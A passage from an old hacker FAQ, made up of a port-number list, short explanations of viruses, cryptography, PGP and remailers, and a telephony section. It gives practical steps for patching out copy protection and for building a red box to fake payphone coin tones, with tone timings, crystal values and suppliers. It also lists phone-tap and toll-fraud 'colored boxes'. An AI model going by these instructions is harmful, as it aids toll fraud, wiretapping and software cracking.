                      NEW-RWHO        550/UDP    NEW-WHO
                            DSF             555/TCP
                            DSF             555/UDP

                                                            #hack FAQ (70/2227)
                     REMOTEFS        556/TCP    RFS SERVER
                     REMOTEFS        556/UDP    RFS SERVER
                     RMONITOR        560/TCP    RMONITORD
                     RMONITOR        560/UDP    RMONITORD
                            MONITOR         561/TCP
                            MONITOR         561/UDP
                       CHSHELL         562/TCP    CHCMD
                       CHSHELL         562/UDP    CHCMD
                9PFS            564/TCP    PLAN 9 FILE SERVICE
                9PFS            564/UDP    PLAN 9 FILE SERVICE
                       WHOAMI          565/TCP    WHOAMI
                       WHOAMI          565/UDP    WHOAMI
                       METER           570/TCP    DEMON
                       METER           570/UDP    DEMON
                       METER           571/TCP    UDEMON
                       METER           571/UDP    UDEMON
                   IPCSERVER       600/TCP    SUN IPC SERVER
                   IPCSERVER       600/UDP    SUN IPC SERVER
                        NQS             607/TCP    NQS
                        NQS             607/UDP    NQS
                            MDQS            666/TCP
                            MDQS            666/UDP

                                                            #hack FAQ (70/2249)
             ELCSD           704/TCP    ERRLOG COPY/SERVER DAEMON
             ELCSD           704/UDP    ERRLOG COPY/SERVER DAEMON
             NETCP           740/TCP    NETSCOUT CONTROL PROTOCOL
             NETCP           740/UDP    NETSCOUT CONTROL PROTOCOL
                       NETGW           741/TCP    NETGW
                       NETGW           741/UDP    NETGW
           NETRCS          742/TCP    NETWORK BASED REV. CONT. SYS.
           NETRCS          742/UDP    NETWORK BASED REV. CONT. SYS.
              FLEXLM          744/TCP    FLEXIBLE LICENSE MANAGER
              FLEXLM          744/UDP    FLEXIBLE LICENSE MANAGER
               FUJITSU-DEV     747/TCP    FUJITSU DEVICE CONTROL
               FUJITSU-DEV     747/UDP    FUJITSU DEVICE CONTROL
         RIS-CM          748/TCP    RUSSELL INFO SCI CALENDAR MANAGER
         RIS-CM          748/UDP    RUSSELL INFO SCI CALENDAR MANAGER
              KERBEROS-ADM    749/TCP    KERBEROS ADMINISTRATION
              KERBEROS-ADM    749/UDP    KERBEROS ADMINISTRATION
                            RFILE           750/TCP
                            LOADAV          750/UDP
                            PUMP            751/TCP
                            PUMP            751/UDP
                            QRH             752/TCP
                            QRH             752/UDP

                                                            #hack FAQ (70/2271)
                            RRH             753/TCP
                            RRH             753/UDP
                       TELL            754/TCP     SEND
                       TELL            754/UDP     SEND
                            NLOGIN          758/TCP
                            NLOGIN          758/UDP
                            CON             759/TCP
                            CON             759/UDP
                            NS              760/TCP
                            NS              760/UDP
                            RXE             761/TCP
                            RXE             761/UDP
                            QUOTAD          762/TCP
                            QUOTAD          762/UDP
                            CYCLESERV       763/TCP
                            CYCLESERV       763/UDP
                            OMSERV          764/TCP
                            OMSERV          764/UDP
                            WEBSTER         765/TCP
                            WEBSTER         765/UDP
                       PHONEBOOK       767/TCP    PHONE
                       PHONEBOOK       767/UDP    PHONE

                                                            #hack FAQ (70/2293)
                            VID             769/TCP
                            VID             769/UDP
                            CADLOCK         770/TCP
                            CADLOCK         770/UDP
                            RTIP            771/TCP
                            RTIP            771/UDP
                            CYCLESERV2      772/TCP
                            CYCLESERV2      772/UDP
                            SUBMIT          773/TCP
                            NOTIFY          773/UDP
                            RPASSWD         774/TCP
                            ACMAINT_DBD     774/UDP
                            ENTOMB          775/TCP
                            ACMAINT_TRANSD  775/UDP
                            WPAGES          776/TCP
                            WPAGES          776/UDP
                            WPGS            780/TCP
                            WPGS            780/UDP
         HP-COLLECTOR    781/TCP        HP PERFORMANCE DATA COLLECTOR
         HP-COLLECTOR    781/UDP        HP PERFORMANCE DATA COLLECTOR
        HP-MANAGED-NODE 782/TCP        HP PERFORMANCE DATA MANAGED NODE
        HP-MANAGED-NODE 782/UDP        HP PERFORMANCE DATA MANAGED NODE

                                                            #hack FAQ (70/2315)
       HP-ALARM-MGR    783/TCP        HP PERFORMANCE DATA ALARM MANAGER
       HP-ALARM-MGR    783/UDP        HP PERFORMANCE DATA ALARM MANAGER
                            MDBS_DAEMON     800/TCP
                            MDBS_DAEMON     800/UDP
                            DEVICE          801/TCP
                            DEVICE          801/UDP
              XTREELIC        996/TCP        XTREE LICENSE SERVER
              XTREELIC        996/UDP        XTREE LICENSE SERVER
                            MAITRD          997/TCP
                            MAITRD          997/UDP
                            BUSBOY          998/TCP
                            PUPARP          998/UDP
                            GARCON          999/TCP
                   APPLIX          999/UDP        APPLIX AC
                            PUPROUTER       999/TCP
                            PUPROUTER       999/UDP
                           CADLOCK         1000/TCP
                           OCK             1000/UDP
                 BLACKJACK       1025/TCP   NETWORK BLACKJACK
                 BLACKJACK       1025/UDP   NETWORK BLACKJACK
                           HERMES          1248/TCP
                           HERMES          1248/UDP

                                                            #hack FAQ (70/2337)
              BBN-MMC         1347/TCP   MULTI MEDIA CONFERENCING
              BBN-MMC         1347/UDP   MULTI MEDIA CONFERENCING
              BBN-MMX         1348/TCP   MULTI MEDIA CONFERENCING
              BBN-MMX         1348/UDP   MULTI MEDIA CONFERENCING
           SBOOK           1349/TCP   REGISTRATION NETWORK PROTOCOL
           SBOOK           1349/UDP   REGISTRATION NETWORK PROTOCOL
           EDITBENCH       1350/TCP   REGISTRATION NETWORK PROTOCOL
           EDITBENCH       1350/UDP   REGISTRATION NETWORK PROTOCOL
              EQUATIONBUILDER 1351/TCP   DIGITAL TOOL WORKS (MIT)
              EQUATIONBUILDER 1351/UDP   DIGITAL TOOL WORKS (MIT)
                     LOTUSNOTE       1352/TCP   LOTUS NOTE
                     LOTUSNOTE       1352/UDP   LOTUS NOTE
                       INGRESLOCK      1524/TCP   INGRES
                       INGRESLOCK      1524/UDP   INGRES
                       ORASRV          1525/TCP   ORACLE
                       ORASRV          1525/UDP   ORACLE
              PROSPERO-NP     1525/TCP   PROSPERO NON-PRIVILEGED
              PROSPERO-NP     1525/UDP   PROSPERO NON-PRIVILEGED
                       TLISRV          1527/TCP   ORACLE
                       TLISRV          1527/UDP   ORACLE
                       COAUTHOR        1529/TCP   ORACLE
                       COAUTHOR        1529/UDP   ORACLE

                                                            #hack FAQ (70/2359)
                           ISSD            1600/TCP
                           ISSD            1600/UDP
                           NKD             1650/TCP
                           NKD             1650/UDP
                           CALLBOOK        2000/TCP
                           CALLBOOK        2000/UDP
                           DC              2001/TCP
                       WIZARD          2001/UDP    CURRY
                           GLOBE           2002/TCP
                           GLOBE           2002/UDP
                           MAILBOX         2004/TCP
                   EMCE            2004/UDP    CCWS MM CONF
                           BERKNET         2005/TCP
                           ORACLE          2005/UDP
                           INVOKATOR       2006/TCP
                       RAID-CC         2006/UDP    RAID
                           DECTALK         2007/TCP
                           RAID-AM         2007/UDP
                           CONF            2008/TCP
                           TERMINALDB      2008/UDP
                           NEWS            2009/TCP
                           WHOSOCKAMI      2009/UDP

                                                            #hack FAQ (70/2381)
                           SEARCH          2010/TCP
                           PIPE_SERVER     2010/UDP
                       RAID-CC         2011/TCP    RAID
                           SERVSERV        2011/UDP
                           TTYINFO         2012/TCP
                           RAID-AC         2012/UDP
                           RAID-AM         2013/TCP
                           RAID-CD         2013/UDP
                           TROFF           2014/TCP
                           RAID-SF         2014/UDP
                           CYPRESS         2015/TCP
                           RAID-CS         2015/UDP
                           BOOTSERVER      2016/TCP
                           BOOTSERVER      2016/UDP
                           CYPRESS-STAT    2017/TCP
                           BOOTCLIENT      2017/UDP
                           TERMINALDB      2018/TCP
                           RELLPACK        2018/UDP
                           WHOSOCKAMI      2019/TCP
                           ABOUT           2019/UDP
                           XINUPAGESERVER  2020/TCP
                           XINUPAGESERVER  2020/UDP

                                                            #hack FAQ (70/2403)
                           SERVEXEC        2021/TCP
                           XINUEXPANSION1  2021/UDP
                           DOWN            2022/TCP
                           XINUEXPANSION2  2022/UDP
                           XINUEXPANSION3  2023/TCP
                           XINUEXPANSION3  2023/UDP
                           XINUEXPANSION4  2024/TCP
                           XINUEXPANSION4  2024/UDP
                           ELLPACK         2025/TCP
                           XRIBS           2025/UDP
                           SCRABBLE        2026/TCP
                           SCRABBLE        2026/UDP
                           SHADOWSERVER    2027/TCP
                           SHADOWSERVER    2027/UDP
                           SUBMITSERVER    2028/TCP
                           SUBMITSERVER    2028/UDP
                           DEVICE2         2030/TCP
                           DEVICE2         2030/UDP
                           BLACKBOARD      2032/TCP
                           BLACKBOARD      2032/UDP
                           GLOGGER         2033/TCP
                           GLOGGER         2033/UDP

                                                            #hack FAQ (70/2425)
                           SCOREMGR        2034/TCP
                           SCOREMGR        2034/UDP
                           IMSLDOC         2035/TCP
                           IMSLDOC         2035/UDP
                           OBJECTMANAGER   2038/TCP
                           OBJECTMANAGER   2038/UDP
                           LAM             2040/TCP
                           LAM             2040/UDP
                           INTERBASE       2041/TCP
                           INTERBASE       2041/UDP
                           ISIS            2042/TCP
                           ISIS            2042/UDP
                           ISIS-BCAST      2043/TCP
                           ISIS-BCAST      2043/UDP
                           RIMSL           2044/TCP
                           RIMSL           2044/UDP
                           CDFUNC          2045/TCP
                           CDFUNC          2045/UDP
                           SDFUNC          2046/TCP
                           SDFUNC          2046/UDP
                           DLS             2047/TCP
                           DLS             2047/UDP

                                                            #hack FAQ (70/2447)
                           DLS-MONITOR     2048/TCP
                           DLS-MONITOR     2048/UDP
                           SHILP           2049/TCP
                           SHILP           2049/UDP
            WWW-DEV         2784/TCP   WORLD WIDE WEB - DEVELOPMENT
            WWW-DEV         2784/UDP   WORLD WIDE WEB - DEVELOPMENT
                           NSWS            3049/TCP
                          NSWS            3049/DDDDP
             RFA             4672/TCP   REMOTE FILE ACCESS SERVER
             RFA             4672/UDP   REMOTE FILE ACCESS SERVER
                           COMMPLEX-MAIN   5000/TCP
                           COMMPLEX-MAIN   5000/UDP
                           COMMPLEX-LINK   5001/TCP
                           COMMPLEX-LINK   5001/UDP
                RFE             5002/TCP   RADIO FREE ETHERNET
                RFE             5002/UDP   RADIO FREE ETHERNET
                           RMONITOR_SECURE 5145/TCP
                           RMONITOR_SECURE 5145/UDP
                           PADL2SIM        5236/TCP
                           PADL2SIM        5236/UDP
          SUB-PROCESS     6111/TCP   HP SOFTBENCH SUB-PROCESS CONTROL
          SUB-PROCESS     6111/UDP   HP SOFTBENCH SUB-PROCESS CONTROL

                                                            #hack FAQ (70/2469)
                           XDSXDM          6558/UDP
                           XDSXDM          6558/TCP
                 AFS3-FILESERVER 7000/TCP   FILE SERVER ITSELF
                 AFS3-FILESERVER 7000/UDP   FILE SERVER ITSELF
            AFS3-CALLBACK   7001/TCP   CALLBACKS TO CACHE MANAGERS
            AFS3-CALLBACK   7001/UDP   CALLBACKS TO CACHE MANAGERS
              AFS3-PRSERVER   7002/TCP   USERS & GROUPS DATABASE
              AFS3-PRSERVER   7002/UDP   USERS & GROUPS DATABASE
              AFS3-VLSERVER   7003/TCP   VOLUME LOCATION DATABASE
              AFS3-VLSERVER   7003/UDP   VOLUME LOCATION DATABASE
        AFS3-KASERVER   7004/TCP   AFS/KERBEROS AUTHENTICATION SERVICE
        AFS3-KASERVER   7004/UDP   AFS/KERBEROS AUTHENTICATION SERVICE
              AFS3-VOLSER     7005/TCP   VOLUME MANAGMENT SERVER
              AFS3-VOLSER     7005/UDP   VOLUME MANAGMENT SERVER
            AFS3-ERRORS     7006/TCP   ERROR INTERPRETATION SERVICE
            AFS3-ERRORS     7006/UDP   ERROR INTERPRETATION SERVICE
               AFS3-BOS        7007/TCP   BASIC OVERSEER PROCESS
               AFS3-BOS        7007/UDP   BASIC OVERSEER PROCESS
              AFS3-UPDATE     7008/TCP   SERVER-TO-SERVER UPDATER
              AFS3-UPDATE     7008/UDP   SERVER-TO-SERVER UPDATER
            AFS3-RMTSYS     7009/TCP   REMOTE CACHE MANAGER SERVICE
            AFS3-RMTSYS     7009/UDP   REMOTE CACHE MANAGER SERVICE

                                                            #hack FAQ (70/2491)
                           MAN             9535/TCP
                           MAN             9535/UDP
                           ISODE-DUA       17007/TCP
                           ISODE-DUA       17007/UDP
                                       
                                       
                  23. WHAT IS A TROJAN/WORM/VIRUS/LOGIC BOMB?
                                       
          THIS FAQ ANSWER IS EXCERPTED FROM: COMPUTER SECURITY BASICS
                                                BY DEBORAH RUSSELL
                                               AND G.T. GENGEMI SR.
                                       
      TROJAN:     AN INDEPENDENT PROGRAM THAT APPEARS TO PERFORM A USEFUL
                   FUNCTION BUT THAT HIDES ANOTHER UNAUTHORIZED PROGRAM
                 INSIDE IT.  WHEN AN AUTHORIZED USER PERFORMS THE APPARENT
                   FUNCTION, THE TROJAN HORSE PERFORMS THE UNAUTHORIZED
                  FUNCTION AS WELL (OFTEN USURPING THE PRIVILEGES OF THE
                                          USER).
                                       
         VIRUS:      A CODE FRAGMENT (NOT AN INDEPENDENT PROGRAM) THAT
                REPRODUCES BY ATTACHING TO ANOTHER PROGRAM.  IT MAY DAMAGE
                  DATA DIRECTLY, OR IT MAY DEGRADE SYSTEM PERFORMANCE BY

                                                            #hack FAQ (70/2513)
                 TAKING OVER SYSTEM RESOURCES WHICH ARE THEN NOT AVAILABLE
                                   TO AUTHORIZED USERS.
                                       
     WORM:       AN INDEPENDENT PROGRAM THAT REPRODUCES BY COPYING ITSELF
                 FROM ONE SYSTEM TO ANOTHER, USUALLY OVER A NETWORK.  LIKE
                    A VIRUS, A WORM MAY DAMAGE DATA DIRECTLY, OR IT MAY
                DEGRADE SYSTEM PERFORMANCE BY TYING UP SYSTEM RESOURCES AND
                               EVEN SHUTTING DOWN A NETWORK.
                                       
     LOGIC BOMB: A METHOD FOR RELEASING A SYSTEM ATTACK OF SOME KIND.  IT
                 IS TRIGGERED WHEN A PARTICULAR CONDITION (E.G., A CERTAIN
                             DATE OR SYSTEM OPERATION) OCCURS.
                                       
                                       
               24. HOW CAN I PROTECT MYSELF FROM VIRII AND SUCH?
                                       
     ALWAYS WRITE PROTECT YOUR FLOPPY DISKS WHEN YOU ARE NOT PURPOSEFULLY
                               WRITING TO THEM.
                                       
    USE ATTRIB TO MAKE ALL OF YOUR EXE AND COM FILES READ ONLY.  THIS WILL
                 PROTECT YOU FROM MANY POORLY WRITTEN VIRUSES.
                                       

                                                            #hack FAQ (70/2535)
     SCAN ANY SOFTWARE THAT YOU RECEIVE WITH A RECENT COPY OF A GOOD VIRUS
    SCANNER.  THE BEST VIRUS SCANNER CURRENTLY AVAILABLE FOR DOS IS F-PROT
     BY FRIDRIK SKULASON.  THE CURRENT VERSION IS FP-212C.  IT IS BEST TO
     USE MORE THAN ONE VIRUS SCANNER.  THAT WILL DECREASE YOUR CHANCES OF
                               MISSING A VIRUS.
                                       
      BACKUP REGULARLY, AND KEEP SEVERAL GENERATIONS OF BACKUPS ON HAND.
    IF YOU ALWAYS BACKUP OVER YOUR LAST BACKUP, YOU MAY FIND YOURSELF WITH
                           AN INFECTED BACKUP TAPE.
                                       
                                       
                          25. WHAT IS CRYPTOXXXXXXX?
                                       
          THIS FAQ ANSWER IS EXCERPTED FROM: COMPUTER SECURITY BASICS
                                                BY DEBORAH RUSSELL
                                               AND G.T. GENGEMI SR.
                                       
      A MESSAGE IS CALLED EITHER PLAINTEXT OR CLEARTEXT.  THE PROCESS OF
     DISGUISING A MESSAGE IN SUCH A WAY AS TO HIDE ITS SUBSTANCE IS CALLED
     ENCRYPTION.  AN ENCRYPTED MESSAGE IS CALLED CIPHERTEXT.  THE PROCESS
        OF TURNING CIPHERTEXT BACK INTO PLAINTEXT IS CALLED DECRYPTION.
                                       

                                                            #hack FAQ (70/2557)
    THE ART AND SCIENCE OF KEEPING MESSAGES SECURE IS CALLED CRYPTOGRAPHY,
           AND IT IS PRACTICED BY CRYPTOGRAPHERS.  CRYPTANALYSTS ARE
        PRACTITIONERS OF CRYPTANALYSIS, THE ART AND SCIENCE OF BREAKING
         CIPHERTEXT, I.E. SEEING THROUGH THE DISGUISE.  THE BRANCH OF
      MATHEMATICS EMBODYING BOTH CRYPTOGRAPHY AND CRYPTANALYSIS IS CALLED
         CRYPTOLOGY, AND IT'S PRACTITIONERS ARE CALLED CRYPTOLOGISTS.
                                       
                                       
                               26. WHAT IS PGP?
                                       
            THIS FAQ ANSWER IS EXCERPTED FROM: PGP(TM) USER'S GUIDE
                                            VOLUME I: ESSENTIAL TOPICS
                                               BY PHILIP ZIMMERMANN
                                       
     PGP(TM) USES PUBLIC-KEY ENCRYPTION TO PROTECT E-MAIL AND DATA FILES.
       COMMUNICATE SECURELY WITH PEOPLE YOU'VE NEVER MET, WITH NO SECURE
     CHANNELS NEEDED FOR PRIOR EXCHANGE OF KEYS.  PGP IS WELL FEATURED AND
       FAST, WITH SOPHISTICATED KEY MANAGEMENT, DIGITAL SIGNATURES, DATA
                    COMPRESSION, AND GOOD ERGONOMIC DESIGN.
                                       
     PRETTY GOOD(TM) PRIVACY (PGP), FROM PHIL'S PRETTY GOOD SOFTWARE, IS A
      HIGH SECURITY CRYPTOGRAPHIC SOFTWARE APPLICATION FOR MS-DOS, UNIX,

                                                            #hack FAQ (70/2579)
     VAX/VMS, AND OTHER COMPUTERS.  PGP ALLOWS PEOPLE TO EXCHANGE FILES OR
    MESSAGES WITH PRIVACY, AUTHENTICATION, AND CONVENIENCE.  PRIVACY MEANS
          THAT ONLY THOSE INTENDED TO RECEIVE A MESSAGE CAN READ IT.
    AUTHENTICATION MEANS THAT MESSAGES THAT APPEAR TO BE FROM A PARTICULAR
      PERSON CAN ONLY HAVE ORIGINATED FROM THAT PERSON. CONVENIENCE MEANS
      THAT PRIVACY AND AUTHENTICATION ARE PROVIDED WITHOUT THE HASSLES OF
    MANAGING KEYS ASSOCIATED WITH CONVENTIONAL CRYPTOGRAPHIC SOFTWARE.  NO
    SECURE CHANNELS ARE NEEDED TO EXCHANGE KEYS BETWEEN USERS, WHICH MAKES
      PGP MUCH EASIER TO USE.  THIS IS BECAUSE PGP IS BASED ON A POWERFUL
               NEW TECHNOLOGY CALLED "PUBLIC KEY" CRYPTOGRAPHY.
                                       
        PGP COMBINES THE CONVENIENCE OF THE RIVEST-SHAMIR-ADLEMAN (RSA)
     PUBLIC KEY CRYPTOSYSTEM WITH THE SPEED OF CONVENTIONAL CRYPTOGRAPHY,
        MESSAGE DIGESTS FOR DIGITAL SIGNATURES, DATA COMPRESSION BEFORE
     ENCRYPTION, GOOD ERGONOMIC DESIGN, AND SOPHISTICATED KEY MANAGEMENT.
       AND PGP PERFORMS THE PUBLIC-KEY FUNCTIONS FASTER THAN MOST OTHER
       SOFTWARE IMPLEMENTATIONS.  PGP IS PUBLIC KEY CRYPTOGRAPHY FOR THE
                                    MASSES.
                                       
                                       
                             27. WHAT IS TEMPEST?
                                       

                                                            #hack FAQ (70/2601)
    COMPUTERS AND OTHER ELECTRONIC EQUIPMENT RELEASE INTERFERENCE TO THEIR
      SURROUNDING ENVIRONMENT.  YOU MAY OBSERVE THIS BY PLACING TWO VIDEO
     MONITORS CLOSE TOGETHER.  THE PICTURES WILL BEHAVE ERRATICALLY UNTIL
                             YOU SPACE THEM APART.
                                       
     ALTHOUGH MOST OF THE TIME THESE EMISSIONS ARE SIMPLY ANNOYANCES, THEY
     CAN SOMETIMES BE VERY HELPFUL.  SUPPOSE WE WANTED TO SEE WHAT PROJECT
    A TARGET WAS WORKING ON.  WE COULD SIT IN A VAN OUTSIDE HER OFFICE AND
     USE SENSITIVE ELECTRONIC EQUIPMENT TO ATTEMPT TO PICK UP AND DECIPHER
                    THE EMANATIONS FROM HER VIDEO MONITOR.
                                       
         OUR COMPETITOR, HOWEVER, COULD SHIELD THE EMANATIONS FROM HER
             EQUIPMENT OR USE EQUIPMENT WITHOUT STRONG EMANATIONS.
                                       
      TEMPEST IS THE US GOVERNMENT PROGRAM FOR EVALUATION AND ENDORSEMENT
           OF ELECTRONIC EQUIPMENT THAT IS SAFE FROM EAVESDROPPING.
                                       
                                       
                      28. WHAT IS AN ANONYMOUS REMAILER?
                                       
     AN ANONYMOUS REMAILER IS A SYSTEM ON THE INTERNET THAT ALLOWS YOU TO
        SEND E-MAIL ANONYMOUSLY OR POST MESSAGES TO USENET ANONYMOUSLY.

                                                            #hack FAQ (71/2624)
      YOU APPLY FOR AN ANONYMOUS ID AT THE REMAILER SITE.  THEN, WHEN YOU
    SEND A MESSAGE TO THE REMAILER, IT SENDS IT OUT FROM YOUR ANONYMOUS ID
     AT THE REMAILER.  NO ONE READING THE POST WILL KNOW YOUR REAL ACCOUNT
     NAME OR HOST NAME.  IF SOMEONE SENDS A MESSAGE TO YOUR ANONYMOUS ID,
          IT WILL BE FORWARDED TO YOUR REAL ACCOUNT BY THE REMAILER.
                                       
                                       
            29. WHAT ARE THE ADDRESSES OF SOME ANONYMOUS REMAILERS?
                                       
       THE MOST POPULAR AND STABLE ANONYMOUS REMAILER IS ANON.PENET.FI,
         OPERATED BY JOHAN HELSINGUS.  TO OBTAIN AN ANONYMOUS ID, MAIL
     PING@ANON.PENET.FI.  FOR ASSISTANCE IS OBTAINING AN ANONYMOUS ACCOUNT
                      AT PENET, MAIL HELP@ANON.PENET.FI.
                                       
                                       
                     30. HOW DO I DEFEAT COPY PROTECTION?
                                       
     THERE ARE TWO COMMON METHODS OF DEFEATING COPY PROTECTION.  THE FIRST
      IS TO USE A PROGRAM THAT REMOVES COPY PROTECTION.  POPULAR PROGRAMS
      THAT DO THIS ARE COPYIIPC FROM CENTRAL POINT SOFTWARE AND COPYWRITE
      FROM QUAID SOFTWARE.  THE SECOND METHOD INVOLVES PATCHING THE COPY
     PROTECTED PROGRAM.  FOR POPULAR SOFTWARE, YOU MAY BE ABLE TO LOCATE A

                                                            #hack FAQ (71/2646)
     READY MADE PATCH.  YOU CAN THEM APPLY THE PATCH USING ANY HEX EDITOR,
    SUCH AS DEBUG OR THE PETER NORTON'S DISKEDIT.  IF YOU CANNOT, YOU MUST
                         PATCH THE SOFTWARE YOURSELF.
                                       
     WRITING A PATCH REQUIRES A DEBUGGER, SUCH AS SOFT-ICE OR SOURCER.  IT
    ALSO REQUIRES SOME KNOWLEDGE OF ASSEMBLY LANGUAGE.  LOAD THE PROTECTED
      PROGRAM UNDER THE DEBUGGER AND WATCH FOR IT TO CHECK THE PROTECTION
     MECHANISM.  WHEN IT DOES, CHANGE THAT PORTION OF THE CODE.  THE CODE
     CAN BE CHANGED FROM JE (JUMP ON EQUAL) OR JNE (JUMP ON NOT EQUAL) TO
     JMP (JUMP UNCONDITIONALLY).  OR THE CODE MAY SIMPLY BE REPLACED WITH
                       NOP (NO OPERATION) INSTRUCTIONS.
                                       
                                       
                                       
                                       
                             SECTION B: TELEPHONY
                             ~~~~~~~~~~~~~~~~~~~~
                                       
                            01. WHAT IS A RED BOX?
                                       
       WHEN A COIN IS INSERTED INTO A PAYPHONE, THE PHONE EMITS A SET OF
      TONES.  A RED BOX IS A DEVICE THAT SIMULATES THOSE TONES, WITH THE

                                                            #hack FAQ (71/2668)
      PURPOSE OF FOOLING THE PAYPHONE INTO BELIEVING YOU HAVE INSERTED AN
                      ACTUAL COIN.  THE ACTUAL TONES ARE:
                                       
                    NICKEL SIGNAL      1700+2200  0.060S ON
     DIME SIGNAL        1700+2200  0.060S ON, 0.060S OFF, TWICE REPEATING
      QUARTER SIGNAL     1700+2200  33MS ON, 33MS OFF, 5 TIMES REPEATING
                                       
                                       
                         02. HOW DO I BUILD A RED BOX?
                                       
      RED BOXES ARE COMMONLY MANUFACTURED FROM MODIFIED RADIO SHACK TONE
      DIALERS, HALLMARK GREETING CARDS, OR MADE FROM SCRATCH FROM READILY
                       AVAILABLE ELECTRONIC COMPONENTS.
                                       
      TO MAKE A RED BOX FROM A RADIO SHACK 43-141 OR 43-146 TONE DIALER,
       OPEN THE DIALER AND REPLACE THE CRYSTAL (THE LARGEST SHINY METAL
    COMPONENT).  THE EXACT VALUE NEEDED IS 6.502457409MHZ.  UNFORTUNATELY,
      THAT CRYSTAL IS NOT COMMONLY MANUFACTURED.  A CRYSTAL CLOSE TO THAT
       VALUE WILL CREATE A TONE THAT FALLS WITHIN TOLERANCES.  THE MOST
        POPULAR CHOICE IS THE 6.5536MHZ CRYSTAL.  WHEN YOU ARE FINISHED
    REPLACING THE CRYSTAL, PROGRAM THE P1 BUTTON WITH FIVE *'S.  THAT WILL
                SIMULATE A QUARTER TONE EACH TIME YOU PRESS P1.

                                                            #hack FAQ (73/2692)
                   03. WHERE CAN I GET A 6.5536MHZ CRYSTAL?
                                       
     YOUR BEST BET IS A LOCAL ELECTRONICS STORE.  RADIO SHACK SELLS THEM,
     BUT THEY ARE OVERPRICED AND THE STORE MUST ORDER THEM IN.  THIS TAKES
     APPROXIMATELY TWO WEEKS.  IN ADDITION, MANY RADIO SHACK EMPLOYEES DO
                        NOT KNOW THAT THIS CAN BE DONE.
                                       
     OR, YOU COULD ORDER THE CRYSTAL MAIL ORDER.  THIS INTRODUCES SHIPPING
    AND HANDLING CHARGES, WHICH ARE USUALLY MUCH GREATER THAN THE PRICE OF
      THE CRYSTAL.  IT'S BEST TO GET SEVERAL PEOPLE TOGETHER TO SHARE THE
     S&H COST.  OR, BUY FIVE OR SIX YOURSELF AND SELL THEM LATER.  SOME OF
                    THE PLACES YOU CAN ORDER CRYSTALS ARE:
                                       
                                   DIGI-KEY
                            701 BROOKS AVENUE SOUTH
                                 P.O. BOX 677
                       THIEF RIVER FALLS, MN 56701-0677
                                 (80)344-4539
   PART NUMBER:X415-ND    /* NOTE: 6.500MHZ AND ONLY .197 X .433 X .149! */
                              PART NUMBER:X018-ND
                                       
                               JDR MICRODEVICES:

                                                            #hack FAQ (73/2714)
                               2233 BRANHAM LANE
                              SAN JOSE, CA 95124
                                 (800)538-5000
                            PART NUMBER: 6.5536MHZ
                                       
                         TANDY EXPRESS ORDER MARKETING
                              401 NE 38TH STREET
                             FORT WORTH, TX 76106
                                 (800)241-8742
                             PART NUMBER: 10068625
                                       
                                       
                  04. WHICH PAYPHONES WILL A RED BOX WORK ON?
                                       
       RED BOXES WILL WORK ON TELCO OWNED PAYPHONES, BUT NOT ON COCOT'S
                  (CUSTOMER OWNED COIN OPERATED TELEPHONES).
                                       
                                       
                            05. WHAT IS A BLUE BOX?
                                       
     BLUE BOXES USE A 2600HZ TONE TO CONVINCE TELEPHONE SWITCHES THAT USE
     IN-BAND SIGNALLING THAT THE CALLER IS ACTUALLY A TELEPHONE OPERATOR.

                                                            #hack FAQ (73/2736)
      THE CALLER MAY THEN ACCESS SPECIAL SWITCH FUNCTIONS, WITH THE USUAL
          PURPOSE OF MAKING FREE LONG DISTANCE PHONE CALLS, USING THE
                MULTI-FREQUENCY TONES PROVIDED BY THE BLUE BOX.
                                       
                                       
                         06. DO BLUE BOXES STILL WORK?
                                       
    BLUE BOXES STILL WORK IN AREAS USING IN-BAND SIGNALLING.  MODERN PHONE
       SIGNALLING SWITCHES USING ESS (ELECTRONIC SIGNALLING SYSTEMS) USE
      OUT-OF-BAND-SIGNALLING.  NOTHING YOU SEND OVER THE VOICE PORTION OF
                       BANDWIDTH CAN CONTROL THE SWITCH.
                                       
                                       
                           07. WHAT IS A BLACK BOX?
                                       
      A BLACK BOX IS A 1.8K OHM RESISTOR PLACED ACROSS YOUR PHONE LINE TO
    CAUSE THE PHONE COMPANY EQUIPMENT TO BE UNABLE TO DETECT THAT YOU HAVE
     ANSWERED YOUR TELEPHONE.  PEOPLE WHO CALL YOU WILL THEN NOT BE BILLED
          FOR THE TELEPHONE CALL.  BLACK BOXES DO NOT WORK UNDER ESS.
                                       
                                       
                     08. WHAT DO ALL THE COLORED BOXES DO?

                                                            #hack FAQ (74/2759)
      ACRYLIC      STEAL THREE-WAY-CALLING, CALL WAITING AND PROGRAMMABLE
                                       
                    CALL FORWARDING ON OLD 4-WIRE PHONE SYSTEMS
      AQUA         DRAIN THE VOLTAGE OF THE FBI LOCK-IN-TRACE/TRAP-TRACE
                        BEIGE        LINEMAN'S HAND SET
      BLACK        ALLOWS THE CALLING PARTY TO NOT BE BILLED FOR THE CALL
                                       
                                       PLACED
                    BLAST        PHONE MICROPHONE AMPLIFIER
      BLOTTO       SUPPOSEDLY SHORTS EVERY FONE OUT IN THE IMMEDIATE AREA
     BLUE         EMULATE A TRUE OPERATOR BY SEIZING A TRUNK WITH A 2600HZ
                                       
                                        TONE
              BROWN        CREATE A PARTY LINE FROM 2 PHONE LINES
                BUD          TAP INTO YOUR NEIGHBORS PHONE LINE
             CHARTREUSE   USE THE ELECTRICITY FROM YOUR PHONE LINE
             CHEESE       CONNECT TWO PHONES TO CREATE A DIVERTER
           CHROME       MANIPULATE TRAFFIC SIGNALS BY REMOTE CONTROL
     CLEAR        A TELEPHONE PICKUP COIL AND A SMALL AMP USE TO MAKE FREE
                                       
                              CALLS ON FORTRESS PHONES
                COLOR        LINE ACTIVATED TELEPHONE RECORDER

                                                            #hack FAQ (74/2781)
           COPPER       CAUSE CROSSTALK INTERFERENCE ON AN EXTENDER
                           CRIMSON      HOLD BUTTON
       DARK         RE-ROUTE OUTGOING OR INCOMING CALLS TO ANOTHER PHONE
               DAYGLO       CONNECT TO YOUR NEIGHBORS PHONE LINE
       DIVERTOR     RE-ROUTE OUTGOING OR INCOMING CALLS TO ANOTHER PHONE
              DLOC         CREATE A PARTY LINE FROM 2 PHONE LINES
      GOLD         TRACE CALLS, TELL IF THE CALL IS BEING TRACED, AND CAN
                                       
                                   CHANGE A TRACE
    GREEN        EMULATE THE COIN COLLECT, COIN RETURN, AND RINGBACK TONES
                   INFINITY     REMOTELY ACTIVATED PHONE TAP
                        JACK         TOUCH-TONE KEY PAD
                           LIGHT        IN-USE LIGHT
                          LUNCH        AM TRANSMITTER
     MAGENTA      CONNECT A REMOTE PHONE LINE TO ANOTHER REMOTE PHONE LINE
              MAUVE        PHONE TAP WITHOUT CUTTING INTO A LINE
                       NEON         EXTERNAL MICROPHONE
